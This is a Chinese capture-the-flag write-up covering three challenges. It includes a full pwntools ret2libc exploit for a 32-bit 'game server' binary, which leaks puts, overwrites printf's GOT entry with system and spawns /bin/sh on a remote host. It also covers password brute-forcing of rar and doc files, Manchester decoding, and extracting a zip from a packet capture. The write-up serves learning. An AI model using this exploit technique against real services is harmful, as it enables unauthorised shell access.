pwn--game server
拿到题目按照国际惯例先checksec和IDA一波
image
image
发现只开了nx保护,这样的题目一般都是ret2libc了,观察题目,发现第33行的地方有溢出点,通过read函数可以向s里面写nbytes个字节,同时在第21行nbytes又可以被name和occupation这个两个变量的大小所影响,因为snprintf函数是有这个漏洞的:
image
s的栈空间大小是0x111,那么我们让nbytes的大小远超过0x111,就可以实现溢出。
溢出后就需要考虑用那种方式去getshell了,通过调试发现,溢出一次后并不能返回main函数,因此我们只有一次构造溢出的机会,那么这个时候就只能用gadget了,我们可以查到这些gadget:
image
我们这里需要用到的gadget是:pop ebp ret和pop esi ; pop edi ; pop ebp ; ret,利用他们来保存栈平衡,
接着构造paylode首先执行puts函数将puts的真正地址打印出来,接着执行read函数将system的地址写到printf的got表中,接着再执行read函数将/bin/sh参数读入bss段中,最后在执行printf函数也就是相对于执行了system(/bin/sh)
完整的exp如下:
coding:utf-8
from pwn import *
context.log_level = 'debug'
#p = process('./pwn2')
p = remote('123.59.138.180',20000)
elf = ELF("./pwn2")
read_plt = elf.plt["read"]
print "read_plt:"+hex(read_plt)
puts_got = elf.got["puts"]
print "puts_got:"+hex(puts_got)
puts_plt = elf.plt["puts"]
print "puts_plt:"+hex(puts_plt)
p_ebp_ret=0x0804881b# : pop ebp ; ret
p_ebx_ret=0x0804841d# : pop ebx ; ret
ppp_ret=0x08048819# : pop esi ; pop edi ; pop ebp ; ret
bss= elf.bss()
payload1 = 'a'*0xfc
p.recvuntil('name?\n')
p.sendline(payload1)
payload2 = 'b'*0xfc
p.recvuntil('occupation?\n')
p.sendline(payload2)
payload3 = 'Y'
p.recvuntil('[Y/N]\n')
p.sendline(payload3)
payload4 = 'a'*0x111+"aaaa"+ p32(puts_plt) + p32(p_ebp_ret) + p32(puts_got)
payload4 += p32(read_plt) + p32(ppp_ret) + p32(0) + p32(elf.got['printf']) + p32(4)
payload4 += p32(read_plt) + p32(ppp_ret) + p32(0) + p32(bss) + p32(8)
payload4 += p32(elf.plt['printf']) + p32(0xdeadbeef) + p32(bss)
p.sendline(payload4)
p.recvuntil('\n')
p.recvuntil('\n')
p.recvuntil('\n')
sleep(0.1)
puts_addr = u32(p.recv(4)) #0xf7585140
print hex(puts_addr)
#这里得到puts函数真正地址的后四位是5140
#通过在网上查找,可以找到对应的libc版本和system、puts的偏移量:
offset_puts = 0x05f140
offset_system = 0x03a940
libc_base = puts_addr - offset_puts
system_addr = libc_base + offset_system
p.send(p32(system_addr))
p.send('/bin/sh\x00')
p.interactive()
misc-听说你们喜欢手工爆破**
看这个题目标题,就知道应该是爆破了,拿到一个iso文件,解压一波,发现一大堆txt文件和一个rar压缩包:
image
其中txt的内容都一样的,因此是没有叼用的,rar压缩包有密码,要手工爆破,根据目前知道的信息就应该是拿文件名一个个去试密码了,但是500个txt手工试密码不现实,直接提取出来,做成字典再用工具去字典爆破它就行了
image
得到密码后解出一个doc文档,又有密码,这个时候我们就只能直接爆破了:
image
爆破出来后发现里面一段文字,通过调隐藏文字,调背景颜色都没有发现flag,那就说明还有一段要解的地方
image
、
可以看到关键点在这:
“她现在住在F5街区F5街道07号幢,并给他邮箱发了新家里的门禁解锁代码:“123654AAA678876303555111AAA77611A321”,
看起来像是一段密码,但是看不出什么密码,于是想到最开始的“情系海边之城.rar”百度一波发现
image
这是一个曼彻斯特码,然后疯狂百度谷歌,找到了一些解码的脚本,改一改就可以直接解出flag了,需要注意的是,在解的过程中,需要与关键点“F5F507”做比较,一般来说,包含这一段的才是正确的flag,毕竟曼彻斯特码有两种编码方式
image
misc-Not Only Wireshark
打开发现是一个流量包,扔到wireshark,观察了好久没有看出什么东西,
image.png
最后发现,有很多name=xxx,就打算提取出来,提取的话可以用tshark工具
image.png
image.png
提出来以后,感觉前面有点像一个zip压缩包的文件头“504B0304”,于是把123改成5,写到一个文件里面去,发现真的得到一个zip文件:
image.png
image.png
这个时候又发现需要密码才能解压出flag,于是回到流量包,直接查找key的字符串,就发现了密码,密码就是“?id=1128%23”
image.png
flag就得到了,这道题真是气人啊。。。。之前还提取出了好几张png图片疯狂分析
image.png
网友评论